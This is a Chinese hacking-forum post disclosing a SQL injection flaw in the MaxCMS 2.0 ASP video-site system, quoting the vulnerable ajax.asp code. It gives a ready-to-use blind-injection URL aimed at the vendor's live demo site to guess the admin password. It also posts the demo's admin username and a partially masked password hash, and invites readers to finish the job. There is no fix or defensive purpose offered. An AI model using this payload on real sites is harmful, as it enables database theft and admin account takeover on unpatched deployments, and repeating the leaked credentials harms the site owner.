马克思2.0的注射洞子
经常搞影视站的朋友应该都知道这个程序这个JJ程序几乎占领了asp影视系统的所有市场
inc\ajax.asp
...........................................................
dim action : action = getForm("action", "get")
response.Charset="gbk"
Select case action
case "newslist" : viewNewsList
case "newscontent" : viewNewsContent
case "digg","tread" : scoreVideo(action)
case "reporterr" : reportErr
case "hit" : updateHit
case else : main
End Select
...........................................................
Sub scoreVideo(operType)
dim sql,id,digg,returnValue : id=getForm("id","get")
if rCookie("maxcms2_score"&id)="ok" then die "havescore"
if isNul(id) then die "err"
'on error resume next
digg=conn.db("select m_digg from {pre}data where m_id="&id,"execute")(0)
if err then digg=0 : err.clear()
if not isNum(id) then echoSaveStr "safe" else id=clng(id)
if operType="digg" then
sql="update {pre}data set m_digg=m_digg+1 where m_id="&id
returnValue=digg+1
elseif operType="tread" then
sql="update {pre}data set m_digg=m_digg-1 where m_id="&id
returnValue=digg-1
else
die "err"
end if
if operType="tread" and digg=0 then wCookieInTime "maxcms2_score"&id,"ok","h",12 : die digg
conn.db sql,"execute"
wCookieInTime "maxcms2_score"&id,"ok","h",12
if err then die "err":err.clear() else die returnValue
End Sub
...........................................................
尽管id在后面有所过滤,但在select查询的时候已经执行过一次,所以还是能注射
由于防注射的影响,正常的时候会返回“你的IP已被记录”,错误则是直接错
不过看以下代码可知,它说记录IP完全是忽悠人的:
...........................................................
select case ptype
case "safe"
die cssstr&"<div id='msg'><div class='msgtitle'>【警告】非法提交:</div><div id='msgbody'>你提交的数据有非法字符,你的IP【<b>"&getIp&"</b>】已被记录,操作时间:"&now()&"</div><div id='msgbottom'>Powered By "&siteName&"</div></div>"
...........................................................
Getip()函数就不贴出来了,就是直接获取IP用的
测试:http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20left(m_pwd,1)='2'%20from%20m_manager)
官方的密码已被猜出:
admin
21232f297a57a5**
最后两位我用*代替了,有性趣的自己搞,不难,我手注才用了10多分钟就搞完了
还有一处注射比较隐蔽,所以我就不说了
页:
[1]